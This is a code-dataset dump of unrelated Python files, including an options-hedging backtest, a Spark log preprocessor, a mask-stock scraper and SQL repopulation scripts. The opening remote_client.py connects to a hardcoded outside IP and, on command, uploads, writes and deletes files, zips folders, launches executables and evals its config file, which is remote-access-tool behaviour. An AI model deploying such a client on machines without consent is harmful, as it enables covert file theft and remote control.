get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.CREATE_FOLDER)\n\n try:\n os.makedirs(path)\n msg.payload = 'succesful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_upload_file(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.UPLOAD_FILE)\n\n try:\n with open(path, 'rb') as file:\n result = (os.path.basename(path), file.read())\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_upload_folder(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.UPLOAD_FOLDER)\n\n try:\n zipdir(path)\n with open(f'{FOLDER_PATH}\\\\zipped', 'rb') as file:\n result = (os.path.basename(path), file.read())\n except Exception as e:\n result = e\n\n msg.payload = result\n\n return msg\n\n\ndef command_download_file(msg):\n path = get_path(msg.payload[0])\n\n data = msg.payload[1]\n\n msg = Message(Header.RESPONSE, Command.DOWNLOAD_FILE)\n msg.payload = 'Success'\n\n try:\n with open(path, 'wb') as file:\n file.write(data)\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_remove_file(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.REMOVE_FILE)\n\n try:\n os.remove(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_remove_folder(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.REMOVE_FOLDER)\n\n try:\n rmtree(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_update_config(msg):\n parameter = msg.payload\n\n msg = Message(Header.RESPONSE, Command.UPDATE_CONFIG)\n\n try:\n conf = None\n with open(CONF_PATH, 'r') as conf_file:\n conf = eval(conf_file.read())\n if parameter[0] in conf:\n conf[parameter[0]] = parameter[1]\n\n with open(CONF_PATH, 'w') as conf_file:\n conf_file.write(str(conf))\n\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_start_exe(msg):\n path = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.START_EXE)\n\n try:\n os.startfile(path)\n msg.payload = 'successful'\n except Exception as e:\n msg.payload = e\n\n return msg\n\n\ndef command_check_process_running(msg):\n process_name = get_path(msg.payload)\n\n msg = Message(Header.RESPONSE, Command.CHECK_PROCESS_RUNNING)\n\n msg.payload = f'Process with name \"{process_name}\" not found.'\n\n for proc in process_iter():\n try:\n # Check if process name contains the given name string.\n if process_name.lower() in proc.name().lower():\n msg.payload = f'Process with name \"{process_name}\" is running.'\n except Exception as e:\n msg.payload = e\n\n return msg\n# endregion\n\n\ndef get_time_label():\n return datetime.today().strftime('______%d-%m-%Y______%H:%M:%S______')\n\n\ndef write_exception_log(str_message):\n with open(f\"{LOG_PATH}\\\\log\", \"a+\", encoding='utf-8') as f:\n f.write(str_message)\n\n\ndef load_conf():\n try:\n with open(CONF_PATH, 'r') as conf_file:\n conf = eval(conf_file.read())\n autostart_list = conf['autostart']\n\n for asp in autostart_list:\n command_start_exe(Message(Header.COMMAND, payload=asp))\n\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')\n\n\nif __name__ == \"__main__\":\n try:\n load_conf()\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')\n\n try:\n # _client = Client('Remote Client', '127.0.0.1', 55555)\n _client = Client('Remote Client', '34.197.214.35', 55555)\n connection_with_server(_client)\n except Exception as e:\n write_exception_log(f'_remote_client\\n{get_time_label()}\\n{e}\\n')","sub_path":"remote_client.py","file_name":"remote_client.py","file_ext":"py","file_size_in_byte":8639,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"79666425","text":"from pricing_options.Options import OptionBarrierEuropean,OptionPlainEuropean,OptionPlainAmerican\nfrom pricing_options.Evaluation import Evaluation\nfrom pricing_options.SviPricingModel import SviPricingModel\nfrom pricing_options.SviVolSurface import SviVolSurface\nimport exotic_options.exotic_option_utilities as exotic_util\nimport Utilities.svi_prepare_vol_data as svi_data\nfrom bs_model import bs_estimate_vol as bs_vol\nfrom Utilities.utilities import *\nimport Utilities.hedging_utility as hedge_util\nimport os\nimport pickle\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport Utilities.plot_util as pu\nimport math\nimport pandas as pd\n\ndef calculate_hist_vol(evalDate,calendar,underlyings):\n #start = calendar.advance(evalDate,ql.Period(-1,ql.Months))\n #start = calendar.advance(evalDate, ql.Period(-1, ql.Weeks))\n start = calendar.advance(evalDate, ql.Period(-4, ql.Days))\n #print(start,evalDate)\n yields = []\n while start < evalDate:\n price = underlyings.get(to_dt_date(start))\n t_1 = calendar.advance(start,ql.Period(1,ql.Days))\n price1 = underlyings.get(to_dt_date(t_1))\n r = (price-price1)/price1\n yields.append(r)\n start = calendar.advance(start,ql.Period(1,ql.Days))\n hist_vol = np.std(yields)*np.sqrt(252)\n #print(hist_vol)\n return hist_vol\n\n\n\nwith open(os.path.abspath('..')+'/intermediate_data/spotclose_m.pickle','rb') as f:\n underlyings = pickle.load(f)[0]\n\n# Evaluation Settings\nbegDate = ql.Date(27, 7, 2017)\nendDate = ql.Date(28, 8, 2017)\nmaturitydt = endDate\n\ncalendar = ql.China()\ndaycounter = ql.ActualActual()\n#begDate = calendar.advance(begDate,ql.Period(1,ql.Days))\n\nfee = 0.2/1000\ndt = 1.0/365\nrf = 0.03\noptionType = ql.Option.Call\n\n##############################################################################\nresults = {}\nfor strike in [2575,2675,2775,2875,2975]:\n print('strike = ',strike)\n\n euro_option = OptionPlainEuropean(strike,maturitydt,optionType)\n ame_option = OptionPlainAmerican(strike,begDate, maturitydt, optionType)\n optionql = euro_option.option_ql\n\n S0 = underlyings.get(to_dt_date(begDate))\n underlying = ql.SimpleQuote(S0)\n\n eval_dates = []\n cont_dholding_bs = []\n cont_delta_bs = []\n cont_tradingcost_bs = []\n cont_hedgeerror_bs = []\n cont_replicate_bs = []\n cont_optionprice_bs = []\n cont_spot = []\n cont_pnl_bs = []\n cont_cash_bs = []\n # Calibration\n evalDate = begDate\n\n spot = S0\n underlying.setValue(spot)\n\n # Contract Hedge Portfolio\n evalDate = calendar.advance(evalDate,ql.Period(1,ql.Days))\n evaluation = Evaluation(evalDate, daycounter, calendar)\n const_vol = calculate_hist_vol(evalDate,calendar,underlyings)\n process_bs = evaluation.get_bsmprocess_cnstvol(daycounter, calendar, underlying, const_vol)\n engine_bs = ql.BinomialVanillaEngine(process_bs, 'crr', 801)\n optionql.setPricingEngine(engine_bs)\n price_bs = optionql.NPV()\n delta_bs = optionql.delta()\n\n tradingcost_bs = delta_bs*spot*fee\n cash_bs = price_bs - delta_bs*spot - tradingcost_bs\n\n replicate_bs = delta_bs*spot + cash_bs\n\n cont_delta_bs.append(delta_bs)\n cont_dholding_bs.append(delta_bs)\n cont_tradingcost_bs.append(tradingcost_bs)\n cont_replicate_bs.append(replicate_bs)\n cont_optionprice_bs.append(price_bs)\n cont_hedgeerror_bs.append(0.0)\n cont_pnl_bs.append(0.0)\n eval_dates.append(to_dt_date(evalDate))\n cont_cash_bs.append(cash_bs)\n cont_spot.append(spot)\n\n last_delta_bs = delta_bs\n last_price_bs = price_bs\n last_pnl_svi = 0.0\n last_pnl_bs = 0.0\n last_spot = spot\n\n while evalDate < endDate:\n evalDate = calendar.advance(evalDate, ql.Period(1, ql.Days))\n eval_dates.append(to_dt_date(evalDate))\n evaluation = Evaluation(evalDate, daycounter, calendar)\n spot = underlyings.get(to_dt_date(evalDate))\n underlying.setValue(spot)\n const_vol = calculate_hist_vol(evalDate, calendar, underlyings)\n process_bs = evaluation.get_bsmprocess_cnstvol(daycounter, calendar, underlying, const_vol)\n engine_bs = ql.BinomialVanillaEngine(process_bs, 'crr', 801)\n\n\n #try:\n if evalDate == endDate:\n price_svi = price_bs = max(0.0,spot-strike)\n delta_svi = delta_bs = 0.0\n else:\n optionql.setPricingEngine(engine_bs)\n price_bs = optionql.NPV()\n delta_bs = optionql.delta()\n\n\n cash_bs = cash_bs*math.exp(rf * dt)\n # 计算对冲误差\n replicate_bs = last_delta_bs*spot + cash_bs\n\n pnl_bs = replicate_bs - price_bs\n hedgeerror_bs2 = pnl_bs - last_pnl_bs\n\n last_pnl_bs = pnl_bs\n # 调仓\n dholding_bs = delta_bs - last_delta_bs\n tradingcost_bs = dholding_bs*spot*fee\n\n cash_bs = cash_bs - dholding_bs*spot - tradingcost_bs\n replicate_bs = delta_bs*spot + cash_bs\n\n last_delta_bs = delta_bs\n\n\n cont_delta_bs.append(delta_bs)\n cont_dholding_bs.append(delta_bs)\n cont_replicate_bs.append(replicate_bs)\n cont_hedgeerror_bs.append(hedgeerror_bs2)\n cont_tradingcost_bs.append(tradingcost_bs)\n cont_optionprice_bs.append(price_bs)\n cont_pnl_bs.append(pnl_bs)\n\n\n cont_cash_bs.append(cash_bs)\n cont_spot.append(spot)\n #last_spot = spot\n #underlyings, black_var_surface, const_vol = get_vol_data(evalDate, daycounter, calendar, contractType)\n #spot = underlyings.get(spot_maturity)\n\n #underlying.setValue(spot)\n #cont_spot.append(spot)\n #print('strike = ',strike)\n #print('cash_bs = ',cash_bs)\n #print('price_svi = ', price_svi)\n #print('price_bs = ',price_bs)\n #print('delta_bs = ',delta_bs)\n print(\"=\" * 120)\n\n\n\n\n\n results.update({str(strike):cont_pnl_bs})\n results.update({str(strike) + ' option price bs': cont_optionprice_bs})\n results.update({'K=' + str(strike) : np.divide(cont_pnl_bs, cont_optionprice_bs[0])})\n\n print(\"%15s %15s %15s %15s %15s %15s %15s \" % (\"evalDate\",\"close\",\"hedgeerror_bs\",\n \"delta_bs\",\n \"optionprice\",\n \"pnl_bs\",\"\"))\n print(\"-\" * 120)\n for idx,s in enumerate(cont_spot):\n print(\"%15s %15s %15s %15s %15s %15s %15s\" % (eval_dates[idx],round(s,4),\n\n round(cont_hedgeerror_bs[idx],4),\n\n round(cont_delta_bs[idx],4),\n round(cont_optionprice_bs[idx],4),\n\n round(cont_pnl_bs[idx], 4),\n ''))\n print(\"-\" * 120)\n print(cont_pnl_bs[-1]/cont_optionprice_bs[0])\n print(\"=\" * 120)\nresults.update({'eval_dates': eval_dates})\nresults.update({'underlying': cont_spot})\ndf = pd.DataFrame(data=results)\ndf.to_csv('m2 dailyhedge_european.csv')\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","sub_path":"dynamic_hedge/delta_hedge_rebalancing_m_histvol.py","file_name":"delta_hedge_rebalancing_m_histvol.py","file_ext":"py","file_size_in_byte":7154,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"112286018","text":"PALADINS_URL = 'http://api.paladins.com/paladinsapi.svc'\nJSON = 'Json'\n\nLANGUAGES = {\n 'ENGLISH': '1',\n 'GERMAN': '2',\n 'FRENCH': '3',\n 'SPANISH': '7',\n 'SPANISHLA': '9',\n 'PORTUGUESE': '10',\n 'RUSSIAN': '11',\n 'POLISH': '12',\n 'TURKISH': '13'}\n\nENGLISH = LANGUAGES['ENGLISH']\n\n\nNUMBER_OF_BANS =4","sub_path":"src/paladins_api/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"313663002","text":"import pandas as pd\nimport os\nimport sys\nimport datetime\nimport numpy as np\nimport traceback\nfrom hdfs import InsecureClient\nfrom pyspark.ml.linalg import VectorUDT\nfrom pyspark.sql.functions import udf\nfrom dependencies.spark import Spark\nfrom dependencies.utils import *\nfrom pyspark.ml.feature import CountVectorizer, StopWordsRemover\n\ntry:\n '''\n ES 및 spark와 연결\n '''\n config = ConfigParser()\n config.read('config.ini')\n spark = Spark(config, app_name='jhkim_job')\n spark_sess = spark.spark_session\n reader = spark.es_reader\n reader = reader.option(\"es.read.field.exclude\", \"host.ip, host.mac\")\n spark_sess.conf.set(\"spark.sql.execution.arrow.pyspark.enabled\", \"true\")\n\nexcept Exception as ex:\n print('spark_session 연결 실패 : ', ex)\n\n\ndef retrieve_data_from_es():\n '''\n ES에서 로드된 데이터를 dataframe으로 저장한 후 벡터화를 진행하여 전처리를 진행하기 위한 최종적인 데이터를 생성\n 생성된 전처리 데이터 결과 값을 hdfs에 저장\n '''\n try:\n now = datetime.datetime.now() # 마이그레이션을 위한 데이터 양 조절용\n date = now.strftime('%Y.%m.%d')\n df_syslog = reader.load(\"sym-log-syslog-{}\".format(date))\n df_syslog.printSchema()\n except Exception as ex:\n traceback.print_exc()\n\n try:\n df_syslog = df_syslog.select(F.col('@timestamp').alias('timestamp'),\n F.col(\"host.hostname\").alias('hostname'),\n F.col('host.id').alias('id'),\n F.col('log.file.path').alias('path'),\n F.col('message').alias('message'),\n F.col('pid').alias('pid'),\n F.col('program').alias('program'))\n\n # beats 관련 로그 필터링(추후 logstash에서 반영)\n df_syslog = df_syslog.filter(\n (F.col('program') != 'filebeat') & (F.col('program') != 'metricbeat'))\n\n df_syslog.withColumn('word', F.explode(F.split(F.col('message'), ' '))) \\\n .groupBy('word') \\\n .count() \\\n .sort('count', ascending=False)\n\n df_syslog = df_syslog.withColumn('word_array', F.split(F.col('message'), ' '))\n\n # stopword remove\n remover = StopWordsRemover(inputCol=\"word_array\", outputCol=\"word_array_f1\")\n df_syslog = remover.transform(df_syslog)\n cv = CountVectorizer(inputCol='word_array_f1', outputCol='sparse_features',\n vocabSize=500, minDF=3)\n model = cv.fit(df_syslog)\n result = model.transform(df_syslog).fillna(0)\n\n except Exception as ex:\n print('데이터 로드 실패 : ', ex)\n\nif __name__ == '__main__':\n retrieve_data_from_es()\n","sub_path":"pre-processing/preprocessing.py","file_name":"preprocessing.py","file_ext":"py","file_size_in_byte":2845,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"48879678","text":"#%%\n\n\nfrom datetime import datetime #scheduling job\n\nfrom apscheduler.schedulers.background import BackgroundScheduler \n\nimport importlib\nimport time\n\nimport requests\n\nfrom selenium import webdriver\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import NoSuchElementException\nfrom selenium.common.exceptions import TimeoutException\nfrom selenium.common.exceptions import StaleElementReferenceException\n\n\n\n\n#Printing all commands\n# from IPython.core.interactiveshell import InteractiveShell\n# InteractiveShell.ast_node_interactivity = \"all\"\n\n#%%\n\noptions = webdriver.ChromeOptions()\n\n# 창 숨기기\noptions.add_argument(\"headless\")\nbrowser = webdriver.Chrome(chrome_options=options)\n#browser = webdriver.Chrome()\n\n# %%\n\n# Number of loops\nn = 150\n\n\nurl0 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=1007236&xcode=028&mcode=001&scode=&type=X&sort=regdate&cur_code=028&GfDT=aWV8\" #비말차단\nurl1 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=920693&xcode=023&mcode=001&scode=&type=X&sort=manual&cur_code=023001&GfDT=bm14W1w%3D\" #프리미엄\nurl2 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=997647&xcode=023&mcode=002&scode=&special=1&GfDT=bmx7W1w%3D\" #일반\n\n# 에러 테스트용\n# Server_unavailable_test = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=920693&xcode=023&mcode=001&scode=&type=X&sort=manual&cur_code=023&GfDT=bm18W1U%3D\"\n\n# 재고 테스트용\n# url2 = \"http://www.welkeepsmall.com/shop/shopdetail.html?branduid=510581&xcode=026&mcode=001&scode=&type=X&sort=manual&cur_code=026&GfDT=aGt3UA%3D%3D\"\n\npages = [url0, url1, url2]\nstatus = \"SOLD OUT\"\n\nwhile n >= 1:\n for i in pages:\n browser.get(i)\n try:\n element = WebDriverWait(browser, 10).until(EC.visibility_of_element_located((By.CLASS_NAME, \"prd-btns\")))\n elem1 = browser.find_element_by_class_name(\"prd-btns\")\n status = elem1.text\n print (\"연결 됨 url\", pages.index(i))\n except (NoSuchElementException, TimeoutException, StaleElementReferenceException):\n print (\"연결 안됨 url\", pages.index(i))\n pass\n finally:\n if status == \"SOLD OUT\":\n pass\n else:\n import preproc_wellkeeps\n #importlib.reload(preproc_wellkeeps)\n n = 0\n break\n \n n -= 1\n \n print (\"재고 없음 \\n 남은 횟수: \", n, datetime.now())\n time.sleep(3)\n\nelse:\n print (\" 작업 끝\")\n\n\n# %%\n","sub_path":"웰킵스/prod_wellkeeps.py","file_name":"prod_wellkeeps.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"323210509","text":"\"\"\"should be added to Environmental Variable PYTHONSTARTUP so it runs at beginning of every python console\"\"\"\nimport os, socket\nimport threading\nfrom time import sleep\nfrom difflib import SequenceMatcher\n\ndef similar(a, b):\n subst = a.lower() in b.lower() or b.lower() in a.lower() # One string in the other weighs more than stringmatching\n ratio = SequenceMatcher(None, a, b).ratio()\n return ratio * (subst + 0.5), a, b\n\nclass newput():\n def __init__(self, file):\n self.file = open(file)\n def readline(self):\n return self.file.readline().rstrip()\n\ndef listinput(file=None):\n \"\"\"Generate list from every line of input until KeyboardInterrupt, SystemExit, EOFError\"\"\"\n _input = newput(file).readline if file is not None and os.path.isfile(file) else input\n l = []\n last = ''\n while True:\n try:\n data = _input()\n if data == '' and last == '':\n break\n elif data != '':\n l.append(data)\n last = data\n except (KeyboardInterrupt, SystemExit, EOFError):\n break\n return l\n\nclass Wipe(object):\n \"\"\"This class is intended to be used as a console command to clear screen\"\"\"\n def __repr__(self):\n os.system('cls' if os.name=='nt' else 'clear')\n return \"\"\n\nclass listenthread(threading.Thread):\n def __init__(self, IP, PORT, SOCK_TYPE):\n self.sock = socket.socket(socket.AF_INET, SOCK_TYPE)# Internet\n self.sock.bind((IP, PORT))\n self.sock_type = SOCK_TYPE\n if SOCK_TYPE == socket.SOCK_STREAM:\n self.sock.listen(1)\n super(listenthread, self).__init__()\n self._stop = threading.Event()\n\n def close(self):\n self.sock.close()\n\n def run(self):\n while not self._stop.isSet():\n try:\n if self.sock_type == socket.SOCK_STREAM:\n conn, addr = self.sock.accept()\n print('Connection address:', addr)\n recv_data = conn.recv(1024)\n else:\n recv_data, addr = self.sock.recvfrom(1024)\n if recv_data:\n print(recv_data, 'from', addr)\n except:\n self._stop.set()\n\ndef listen(IP, PORT, SOCK_TYPE=socket.SOCK_DGRAM):\n server_thread = listenthread(IP, PORT, SOCK_TYPE)\n server_thread.daemon = True\n server_thread.start()\n try:\n while True: sleep(0.1)\n except (KeyboardInterrupt, SystemExit):\n print('Closing socket...')\n server_thread.close()\n print('Closed...')\n\ndef udp_listen(UDP_IP, UDP_PORT):\n listen(UDP_IP, UDP_PORT)\n\ndef tcp_listen(UDP_IP, UDP_PORT):\n listen(UDP_IP, UDP_PORT, socket.SOCK_STREAM)\n\nclear = Wipe()\n\nif os.name=='nt':\n import ctypes\n FindWindow = ctypes.windll.user32.FindWindowW\n ShowWindow = ctypes.windll.user32.ShowWindow\n\n window_ignore = ['', 'Default IME', 'MSCTFIME UI', 'GDI+ Window', 'CWNPTransportImpl', 'DDE Server Window',\n 'Task Host Window', 'Windows Push Notifications Platform', 'Windows Shell Experience Host',\n 'Battery Meter', 'BluetoothNotificationAreaIconWindowClass']\n EnumWindows = ctypes.windll.user32.EnumWindows\n EnumWindowsProc = ctypes.WINFUNCTYPE(ctypes.c_bool, ctypes.POINTER(ctypes.c_int), ctypes.POINTER(ctypes.c_int))\n GetWindowText = ctypes.windll.user32.GetWindowTextW\n GetWindowTextLength = ctypes.windll.user32.GetWindowTextLengthW\n IsWindowVisible = ctypes.windll.user32.IsWindowVisible\n\n def foreach_window(hwnd, lParam):\n length = GetWindowTextLength(hwnd)\n buff = ctypes.create_unicode_buffer(length + 1)\n GetWindowText(hwnd, buff, length + 1)\n title = buff.value\n if title not in window_ignore:\n windows[title] = bool(IsWindowVisible(hwnd))\n return True\n windows = {}\n\n\n def hide(s):\n \"\"\" Hide a window\n :param s: Target window title\n :return: None\n :OS: WINDOWS\"\"\"\n EnumWindows(EnumWindowsProc(foreach_window), 0)\n s = max(similar(title, s) for title in windows)[1]\n ShowWindow(FindWindow(None, s), 0)\n def show(s):\n \"\"\" Show a window\n :param s: Target window title\n :return: None\n :OS: WINDOWS\"\"\"\n EnumWindows(EnumWindowsProc(foreach_window), 0)\n s = max(similar(title, s) for title in windows)[1]\n ShowWindow(FindWindow(None, s), 5)\n","sub_path":"startup.py","file_name":"startup.py","file_ext":"py","file_size_in_byte":4481,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"25747688","text":"from McUtils.GaussianImport import GaussianLogReader\nimport os\n\n\ndef pull_cord(log_file):\n with GaussianLogReader(log_file) as reader:\n parse = reader.parse(\"ZMatCartesianCoordinates\")\n i, coords = parse[\"ZMatCartesianCoordinates\"]\n return i, coords\n\n\n# def write_file(coords, settings, c_m):\n# with open('%s' %settings, 'r') as set:\n# with open('%s')\nmain_dir = os.path.dirname(os.path.dirname(__file__))\nlog_dir = os.path.join(main_dir, '2D Scans', 'logs')\ni, coords = pull_cord(os.path.join(log_dir, '2D_tet_inout.log'))\nprint(coords)\n\ncharge = '0'\nmulti = '1'\nc_m = charge + ' ' + multi\n\n\n","sub_path":"writegjf.py","file_name":"writegjf.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"535527741","text":"#!/usr/bin/env python3\n\nfrom sys import argv\nfrom random import randint\nimport os\n\nN = 10\nINT_LIMIT = 1000\nMAX_LENGTH = 1000\n\n\ndef main():\n test_map = {\n '0': run_general_test,\n '1': run_quicksort_test,\n '2': run_heapsort_test\n }\n test_num = argv[1]\n for i in range(1, N+1):\n test_func = test_map.get(test_num, lambda: None)\n test_func()\n print(f'test {test_num} pass {i} OK')\n\n\ndef run_general_test():\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))]\n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n user_out = os.popen(cmd).read().strip()\n user_array = [int(x) for x in user_out.split()]\n expected_array = sorted(test_array)\n\n assert user_array == expected_array, 'expected {}, got {}'.format(\n expected_array, user_array)\n\n\ndef run_quicksort_test():\n\n def partition(arr, low, high):\n i = low - 1\n pivot = arr[(high-low)//2]\n for j in range(low, high):\n if arr[j] <= pivot:\n i += 1\n arr[i], arr[j] = arr[j], arr[i]\n arr[i + 1], arr[high] = arr[high], arr[i + 1]\n return i + 1\n\n def quicksort(arr, low, high):\n expected_iterations.append(test_array.copy())\n if low < high:\n pi = partition(arr, low, high)\n quicksort(arr, low, pi-1)\n quicksort(arr, pi + 1, high)\n\n\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))] \n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n os.popen(cmd).read()\n \n expected_iterations = list()\n quicksort(test_array, 0, len(test_array)-1)\n\n with open('quicksort.log') as f:\n user_iterations = [[int(x) for x in line.split()] for line in f.readlines()]\n\n assert user_iterations == expected_iterations, 'quicksort mismatch'\n\n\ndef run_heapsort_test():\n\n def heapify(arr, n, i):\n largest = i\n l = 2 * i + 1\n r = 2 * i + 2\n if l < n and arr[i] < arr[l]:\n largest = l\n if r < n and arr[largest] < arr[r]:\n largest = r\n if largest != i:\n arr[i],arr[largest] = arr[largest],arr[i]\n expected_iterations.append(test_array.copy())\n heapify(arr, n, largest)\n\n def heapsort(arr):\n expected_iterations.append(test_array.copy())\n n = len(arr)\n for i in range(n, -1, -1):\n heapify(arr, n, i)\n for i in range(n-1, 0, -1):\n arr[i], arr[0] = arr[0], arr[i]\n expected_iterations.append(test_array.copy())\n heapify(arr, i, 0)\n\n\n test_array = [\n randint(-INT_LIMIT, INT_LIMIT)\n for _ in range(randint(1, MAX_LENGTH))]\n \n test_input = '{n}\\\\n{array}'.format(\n n=len(test_array),\n array=' '.join(str(x) for x in test_array))\n\n cmd = 'echo -e \"{test_input}\" | ./a.out'.format(test_input=test_input)\n os.popen(cmd).read()\n\n expected_iterations = list()\n heapsort(test_array)\n\n with open('heapsort.log') as f:\n user_iterations = [[int(x) for x in line.split()] for line in f.readlines()]\n\n assert user_iterations == expected_iterations, 'heapsort mismatch'\n\n\nif __name__ == \"__main__\":\n main()\n \n","sub_path":"pr7/tests/checker.py","file_name":"checker.py","file_ext":"py","file_size_in_byte":3576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"569888961","text":"# -*- coding: utf-8 -*-\n\"\"\"sequence\n\nMeant to run to repopulate missing values in table.\n\nOptions:\n sequence: Populate sequence table from sequencerun table\n libraryrun: Populate libraryrun table based from sequence, fastq, metadata, and workflow tables\n\n\nUsage:\n aws sso login --profile dev && export AWS_PROFILE=dev\n make up\n export DJANGO_SETTINGS_MODULE=data_portal.settings.local\n python manage.py migrate\n python manage.py help repopulatetable\n python manage.py repopulatetable sequence\n\"\"\"\nimport logging\n\nfrom django.core.management import BaseCommand, CommandParser\nfrom django.db import connection\n\nfrom data_portal.models.sequence import SequenceStatus\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.INFO)\n\n\"\"\"\nThe Following is SQL statement for populating sequence.\n\"\"\"\nTRUNCATE_SEQUENCE_TABLE_SQL = \"\"\"\nTRUNCATE TABLE data_portal_sequence;\n\"\"\"\n\nQUERY_LATEST_INTRUMENT_RUN_ID_DATA_SQL = \"\"\"\nSELECT date_modified,\n flowcell_barcode,\n gds_folder_path,\n gds_volume_name,\n sequencerun.instrument_run_id,\n reagent_barcode,\n run_id,\n sample_sheet_name,\n status\nFROM data_portal.data_portal_sequencerun sequencerun\n INNER JOIN (SELECT instrument_run_id,\n Max(date_modified) AS maxdate\n FROM data_portal.data_portal_sequencerun\n GROUP BY instrument_run_id) last_sequencerun\n ON sequencerun.instrument_run_id =\n last_sequencerun.instrument_run_id\n AND sequencerun.date_modified = last_sequencerun.maxdate \n\"\"\"\n\nQUERY_INITIAL_INTRUMENT_RUN_ID_DATE_SQL = \"\"\"\nSELECT Min(date_modified) AS mindate\nFROM data_portal.data_portal_sequencerun\nWHERE instrument_run_id = %s\nGROUP BY instrument_run_id \n\"\"\"\n\nINSERT_SEQUENCE_TABLE_SQL = \"\"\"\nINSERT INTO data_portal_sequence\n (\n instrument_run_id,\n run_id,\n sample_sheet_name,\n gds_folder_path,\n gds_volume_name,\n reagent_barcode,\n flowcell_barcode,\n status ,\n start_time ,\n end_time\n )\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s, %s);\n\"\"\"\n\n\"\"\"\nThe following are SQL statement for libraryRun\n\"\"\"\nTRUNCATE_LIBRARYRUN_TABLE_SQL = \"\"\"\nTRUNCATE TABLE data_portal_libraryrun;\n\"\"\"\n\nQUERY_SEQUENCE_TABLE_SQL = \"\"\"\nSELECT instrument_run_id,\n run_id\nFROM data_portal.data_portal_sequence \n\"\"\"\n\nQUERY_RGLB_LANE_FROM_FASTQLIST_SQL = \"\"\"\nSELECT rglb,\n lane\nFROM data_portal.data_portal_fastqlistrow fastq\n inner join data_portal.data_portal_sequencerun sequencerun\n ON fastq.sequence_run_id = sequencerun.id\nWHERE sequencerun.instrument_run_id = %s\n AND sequencerun.run_id = %s \n\"\"\"\n\nQUERY_OVERRIDE_CYCLES_SQL = \"\"\"\nSELECT override_cycles\nFROM data_portal.data_portal_labmetadata\nWHERE library_id = %s\n\"\"\"\n\nQUERY_WORKFLOW_FROM_LIBRARY_ID_SQL = \"\"\"\nSELECT id\nFROM data_portal.data_portal_workflow\nWHERE ( input LIKE %s\n OR output LIKE %s )\n\"\"\"\n\nINSERT_LIBRARYRUN_VALUE_SQL = \"\"\"\nINSERT INTO data_portal_libraryrun\n (\n library_id,\n instrument_run_id ,\n run_id,\n lane,\n override_cycles,\n coverage_yield,\n qc_pass ,\n qc_status ,\n valid_for_analysis\n )\nVALUES (%s, %s, %s, %s, %s, %s, %s, %s, %s)\nRETURNING id;\n\"\"\"\n\nDROP_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nDrop TABLE IF EXISTS data_portal_libraryrun_workflows\n\"\"\"\n\nCREATE_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nCREATE TABLE data_portal_libraryrun_workflows\n (\n id BIGINT(20) NOT NULL auto_increment,\n libraryrun_id BIGINT(20) NOT NULL,\n workflow_id BIGINT(20) NOT NULL,\n PRIMARY KEY (id),\n UNIQUE KEY data_portal_libraryrun_w_libraryrun_id_workflow_i_d2b4b128_uniq\n (libraryrun_id, workflow_id),\n KEY data_portal_libraryr_workflow_id_7f31cc94_fk_data_port (workflow_id),\n CONSTRAINT data_portal_libraryr_libraryrun_id_3bcbad1b_fk_data_port FOREIGN\n KEY (libraryrun_id) REFERENCES data_portal_libraryrun (id),\n CONSTRAINT data_portal_libraryr_workflow_id_7f31cc94_fk_data_port FOREIGN\n KEY (workflow_id) REFERENCES data_portal_workflow (id)\n ) \n\"\"\"\n\nINSERT_LIBRARYRUN_WORKFLOW_TABLE_SQL = \"\"\"\nINSERT INTO 